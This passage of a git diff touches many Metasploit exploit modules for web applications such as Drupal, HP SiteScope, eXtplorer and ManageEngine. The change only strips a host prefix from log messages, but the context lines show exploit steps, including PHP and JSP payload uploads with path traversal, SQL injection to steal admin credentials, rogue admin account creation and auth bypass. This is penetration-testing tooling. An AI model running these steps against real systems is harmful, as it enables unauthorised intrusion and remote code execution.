set SSL true") + vprint_error("SSL required - set SSL true") end Exploit::CheckCode::Detected end @@ -128,7 +128,7 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ - print_good("#{peer} - Added printer successfully") + print_good("Added printer successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 @@ -144,7 +144,7 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ - vprint_good("#{peer} - Added test page to printer queue") + vprint_good("Added test page to printer queue") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 @@ -158,13 +158,13 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ - print_status("#{peer} - Deleted printer '#{printer_name}' successfully") + print_status("Deleted printer '#{printer_name}' successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.") + vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.") + vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.") else - vprint_warning("#{peer} - Could not delete printer '#{printer_name}'") + vprint_warning("Could not delete printer '#{printer_name}'") end end @@ -172,7 +172,7 @@ class Metasploit4 < Msf::Exploit::Remote # Add a printer to CUPS # def add_printer(printer_name, cmd) - vprint_status("#{peer} - Adding new printer '#{printer_name}'") + vprint_status("Adding new printer '#{printer_name}'") ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd" ppd_file = <<-EOF @@ -241,7 +241,7 @@ EOF # Queue a printer test page # def print_test_page(printer_name) - vprint_status("#{peer} - Adding test page to printer queue") + vprint_status("Adding test page to printer queue") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'printers', printer_name), @@ -258,7 +258,7 @@ EOF # Delete a printer # def delete_printer(printer_name) - vprint_status("#{peer} - Deleting printer '#{printer_name}'") + vprint_status("Deleting printer '#{printer_name}'") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 63fc450568..865ca0fbd2 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -101,17 +101,17 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' # upload PHP payload to upload/___1/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| res = upload(base, fname, php) if res.nil? - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end # retrieve and execute PHP payload - print_status("#{peer} - Retrieving file: #{fname}") + print_status("Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload/___1/#{fname}") diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index 71c1b0a0c1..f999bafa7c 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -107,19 +107,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit payload_name = rand_text_alpha(rand(10) + 5) + '.php' - print_status("#{peer} - Using SQL injection to acquire credentials") + print_status("Using SQL injection to acquire credentials") user = database_get_field('users', 'name', 0) if user == false - print_error("#{peer} - Failed to acquire administrator username") + print_error("Failed to acquire administrator username") return end password = database_get_field('users', 'password', 0) if password == false - print_error("#{peer} - Failed to acquire administrator password") + print_error("Failed to acquire administrator password") end - print_status("#{peer} - Using #{user}:#{password}") + print_status("Using #{user}:#{password}") res = send_request_cgi({ 'method' => 'POST', @@ -135,9 +135,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.headers.has_key?('Location') login_cookie = res.get_cookies - print_status("#{peer} - Login successful") + print_status("Login successful") else - print_error("#{peer} - Failed to log in") + print_error("Failed to log in") return end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("<?php #{payload.encoded} ?>", nil, nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => upload, @@ -159,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote path = $1 path = path.sub! "\\", "/" target_path = normalize_uri(target_uri.path, path) - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler else - print_error("#{peer} - Failed to upload file") + print_error("Failed to upload file") return end end diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb index d7fe87b82c..ac0adec7c5 100644 --- a/modules/exploits/multi/http/drupal_drupageddon.rb +++ b/modules/exploits/multi/http/drupal_drupageddon.rb @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote md5_base64 = phpass_encode64(md5, md5.length) md5_stripped = md5_base64[0...22] pass = "$P\\$" + iter_char + salt + md5_stripped - vprint_status("#{peer} - password hash: #{pass}") + vprint_status("password hash: #{pass}") return pass end @@ -129,8 +129,8 @@ class Metasploit3 < Msf::Exploit::Remote form_build_id = $1 if content =~ /name="form_build_id" value="(.+?)"/ form_token = $1 if content =~ /name="form_token" value="(.+?)"/ - vprint_status("#{peer} - form_build_id: #{form_build_id}") - vprint_status("#{peer} - form_token: #{form_token}") + vprint_status("form_build_id: #{form_build_id}") + vprint_status("form_token: #{form_token}") return form_build_id, form_token end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote # TODO: Check if option admin_role exists via admin/people/permissions/roles # call login page to extract tokens - print_status("#{peer} - Testing page") + print_status("Testing page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote 'op' => 'Log in' } - print_status("#{peer} - Creating new user #{user}:#{pass}") + print_status("Creating new user #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote end # login - print_status("#{peer} - Logging in as #{user}:#{pass}") + print_status("Logging in as #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -202,10 +202,10 @@ class Metasploit3 < Msf::Exploit::Remote end cookie = res.get_cookies - vprint_status("#{peer} - cookie: #{cookie}") + vprint_status("cookie: #{cookie}") # call admin interface to extract CSRF token and enabled modules - print_status("#{peer} - Trying to parse enabled modules") + print_status("Trying to parse enabled modules") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end # enable PHP filter - print_status("#{peer} - Enabling the PHP filter module") + print_status("Enabling the PHP filter module") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Response: http 302, Location: http://10.211.55.50/?q=admin/modules - print_status("#{peer} - Setting permissions for PHP filter module") + print_status("Setting permissions for PHP filter module") # allow admin to use php_code res = send_request_cgi({ @@ -280,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote # get administrator role id id = $1 if res.body =~ /for="edit-([0-9]+)-administer-content-types">#{admin_role}:/ - vprint_status("#{peer} - admin role id: #{id}") + vprint_status("admin role id: #{id}") unless id fail_with(Failure::Unknown, "Could not parse out administrator ID") @@ -313,7 +313,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Add new Content page (extract csrf token) - print_status("#{peer} - Getting tokens from create new article page") + print_status("Getting tokens from create new article page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -342,7 +342,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('1', nil, nil, 'form-data; name="promote"') post_data = data.to_s - print_status("#{peer} - Calling preview page. Exploit should trigger...") + print_status("Calling preview page. Exploit should trigger...") send_request_cgi( 'method' => 'POST', 'uri' => uri_path, diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index 0f1d3770c3..eda04d55c3 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_payload - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ 'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")), @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body.empty? if is_payload - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end register_files_for_cleanup(target_path.gsub("../../", "../")) return true @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Determining target") + print_status("Determining target") version = get_version @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") + print_status("Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") sleep(datastore['SLEEP']) return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4))) end @@ -322,10 +322,10 @@ class Metasploit3 < Msf::Exploit::Remote @my_target = pick_target if @my_target.nil? - print_error("#{peer} - Unable to select a target, we must bail.") + print_error("Unable to select a target, we must bail.") return else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end if @my_target == targets[1] @@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote exploit_path = exploit_native end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(exploit_path), 'method' => 'GET' diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 1289010cbd..542509bd28 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -141,16 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";" # bypass auth - print_status("#{peer} - Authenticating as user (#{user})") + print_status("Authenticating as user (#{user})") res = auth_bypass(base, user) if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # search for writable directories - print_status("#{peer} - Retrieving writable subdirectories") + print_status("Retrieving writable subdirectories") begin res = send_request_cgi({ 'method' => 'POST', @@ -163,19 +163,19 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ dir = "#{base}#{$1}" - print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})") + print_status("Successfully retrieved writable subdirectory (#{$1})") else dir = "#{base}" - print_error("#{peer} - Could not find a writable subdirectory.") + print_error("Could not find a writable subdirectory.") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, dir, @fname, php) if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote end # search directories in the web root for the file - print_status("#{peer} - Searching directories for file (#{@fname})") + print_status("Searching directories for file (#{@fname})") begin res = send_request_cgi({ 'method' => 'POST', @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ dir = $1.gsub('\\','') - print_good("#{peer} - Successfully found file") + print_good("Successfully found file") else - print_error("#{peer} - Failed to find file") + print_error("Failed to find file") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (/#{dir}/#{@fname})") + print_status("Executing payload (/#{dir}/#{@fname})") begin send_request_cgi({ 'method' => 'GET', @@ -213,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Connection failed") end if res and res.code != 200 - print_error("#{peer} - Executing payload failed") + print_error("Executing payload failed") end end end diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 0aa285ac06..a829e464cc 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -54,21 +54,21 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = login(base, user, pass) if res if res.code == 200 - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Unknown elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ - vprint_good("#{peer} - Authenticated successfully") + vprint_good("Authenticated successfully") return Exploit::CheckCode::Appears end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Safe @@ -128,23 +128,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login; get session id and token - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = login(base, user, pass) if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ token = "#{$1}" sid = "#{$2}" - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, sid, @fname, php) if res and res.code == 301 and res['location'] =~ /Setting saved/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve PHP file path - print_status("#{peer} - Locating PHP payload file") + print_status("Locating PHP payload file") begin res = send_request_cgi({ 'method' => 'GET', @@ -166,13 +166,13 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/ shell_uri = "#{$1}" @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)') - print_good("#{peer} - Found payload file path (#{shell_uri})") + print_good("Found payload file path (#{shell_uri})") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{shell_uri})") + print_status("Executing payload (#{shell_uri})") begin send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index f8e6b61147..e27433b5a2 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -93,11 +93,11 @@ class Metasploit3 < Msf::Exploit::Remote def exploit if target.name =~ /Windows/ - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # cmd.exe max length is 8192 execute_cmdstager({:linemax => 8000, :nodelete => true}) elsif target.name =~ /Linux/ - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_command(payload.encoded, {:http_timeout => 1}) end end diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 7c5029cbf6..aa418720b9 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -88,15 +88,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' # Create user with empty credentials - print_status("#{peer} - Creating user with empty credentials") + print_status("Creating user with empty credentials") if create_user.nil? - print_error("#{peer} - Failed to create user") + print_error("Failed to create user") return end # Generate an initial JSESSIONID - print_status("#{peer} - Retrieving an initial JSESSIONID") + print_status("Retrieving an initial JSESSIONID") res = send_request_cgi( 'uri' => normalize_uri(@uri, 'servlet/Main'), 'method' => 'POST' @@ -105,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 else - print_error("#{peer} - Retrieve of initial JSESSIONID failed") + print_error("Retrieve of initial JSESSIONID failed") return end # Authenticate login_data = "j_username=&j_password=" - print_status("#{peer} - Authenticating on HP SiteScope Configuration") + print_status("Authenticating on HP SiteScope Configuration") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'j_security_check'), @@ -129,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote session_id = $1 redirect = URI(res.headers['Location']).path else - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end # Follow redirection to complete authentication process - print_status("#{peer} - Following redirection to finish authentication") + print_status("Following redirection to finish authentication") res = send_request_cgi( { 'uri' => redirect, @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Authentication on SiteScope failed") + print_error("Authentication on SiteScope failed") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote traversal = "..\\..\\..\\..\\..\\..\\" end - print_status("#{peer} - Uploading the payload") + print_status("Uploading the payload") res = send_request_cgi( { 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true", @@ -249,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - Payload successfully uploaded to #{path}") + print_good("Payload successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the Payload") + print_error("Error uploading the Payload") return end post_data = Rex::MIME::Message.new post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") - print_status("#{peer} - Uploading the JSP") + print_status("Uploading the JSP") res = send_request_cgi( { 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", @@ -273,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 - print_good("#{peer} - JSP successfully uploaded to #{path}") + print_good("JSP successfully uploaded to #{path}") else - print_error("#{peer} - Error uploading the JSP") + print_error("Error uploading the JSP") return end diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 9503af4d02..25f76c5668 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -81,12 +81,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_command(cmd) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.code == 200 && res.body =~ /#{sig}/ - vprint_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") + vprint_good("Running with user '#{res.body.split(sig)[1].strip}'") return Exploit::CheckCode::Vulnerable end @@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote if @cookie.empty? fail_with(Failure::NoAccess, "#{peer} - Login failed") else - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") + print_good("Logged in as '#{datastore['USERNAME']}'") end end diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 6deb124231..329b8ee316 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -94,12 +94,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_warning("#{peer} - Could not access the script console") + print_warning("Could not access the script console") end if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") end end @@ -113,12 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - vprint_status("#{peer} - Authenticating as '#{user}'") + vprint_status("Authenticating as '#{user}'") res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - vprint_good("#{peer} - Authenticated successfully as '#{user}'") + vprint_good("Authenticated successfully as '#{user}'") # check access to the console - vprint_status("#{peer} - Checking access to the script console") + vprint_status("Checking access to the script console") get_nonce if @nonce.nil? return Exploit::CheckCode::Detected @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Appears end elsif res.headers.include?('X-Jenkins') or res.headers['location'] =~ /authfailed/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(client) if not @to_delete.nil? - print_warning("#{peer} - Deleting #{@to_delete} payload file") + print_warning("Deleting #{@to_delete} payload file") execute_command("rm #{@to_delete}") end end @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res and res.code == 200 and res.body =~ /Executed/ - vprint_good("#{peer} - Command executed successfully") + vprint_good("Command executed successfully") else fail_with(Failure::Unknown, "#{peer} - Failed to execute the command.") end # version 4.6.6 returns a new CSRF nonce in the response if res.body =~ /org\.apache\.catalina\.filters\.CSRF_NONCE=([A-F\d]+)/ @nonce = $1 - vprint_status("#{peer} - Found token '#{@nonce}'") + vprint_status("Found token '#{@nonce}'") # version 4.5.2 does not, so we request a new one else get_nonce @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") http_send_command(java_craft_runtime_exec(cmd)) end @@ -258,23 +258,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - print_good("#{peer} - Authenticated successfully as '#{user}'") + print_good("Authenticated successfully as '#{user}'") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # check access to the console and get CSRF nonce - print_status("#{peer} - Checking access to the script console") + print_status("Checking access to the script console") get_nonce # check operating system if target.name =~ /Automatic/ - print_status("#{peer} - Trying to detect the remote target...") + print_status("Trying to detect the remote target...") @my_target = get_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to detect the remote target") else - print_good("#{peer} - #{@my_target.name} target found") + print_good("#{@my_target.name} target found") end else @my_target = target @@ -283,10 +283,10 @@ class Metasploit3 < Msf::Exploit::Remote # send payload case @my_target['Platform'] when 'win' - print_status("#{peer} - Sending command stager...") + print_status("Sending command stager...") execute_cmdstager({:linemax => 2049}) when 'unix' - print_status("#{peer} - Sending UNIX payload...") + print_status("Sending UNIX payload...") http_send_command(java_craft_runtime_exec(payload.encoded)) when 'linux' print_status("#{rhost}:#{rport} - Sending Linux stager...") diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index ec577eb1d3..3f550c6497 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -104,12 +104,12 @@ class Metasploit3 < Msf::Exploit::Remote @fname = rand_text_numeric(7) # upload PHP payload to userpictures/[fname].php - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php) if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)") + print_status("Executing payload (userpictures/#{@fname}.php)") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 5360e33007..3e7f142d56 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>| - print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") + print_status("Sending PHP payload (#{php.length.to_s} bytes)") send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"), 'data' => php }) - print_status("#{peer} - Requesting data.php") + print_status("Requesting data.php") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php') diff --git a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb index 35b1b39b40..71b8f3c04e 100644 --- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb +++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Automatic targeting failed.") else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end # When using auto targeting, MSF selects the Windows meterpreter as the default payload. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote inject_exec(fullpath) register_file_for_cleanup(fullpath.sub('../','')) - print_status("#{peer} - Requesting #{jsp_name}") + print_status("Requesting #{jsp_name}") send_request_raw({'uri' => normalize_uri(jsp_name)}) end @@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Selecting target, this might take a few seconds...") + print_status("Selecting target, this might take a few seconds...") rand_txt = rand_text_alpha_lower(8) << ".txt" paths = db_paths @@ -488,7 +488,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - print_status("#{peer} - Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") + print_status("Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds") if @my_target['Database'] == 'postgresql' inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'") @@ -528,12 +528,12 @@ class Metasploit3 < Msf::Exploit::Remote if body =~ /id="buildNum" value="([0-9]+)"\/>/ build = $1 if ver_gt(build, '80200') - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else - print_status("#{peer} - Detected Desktop Central v8 #{build} (MySQL)") + print_status("Detected Desktop Central v8 #{build} (MySQL)") end else - print_status("#{peer} - Detected Desktop Central v8 (MySQL)") + print_status("Detected Desktop Central v8 (MySQL)") end # DC v8 < 80200 uses the MySQL database Exploit::CheckCode::Appears @@ -542,7 +542,7 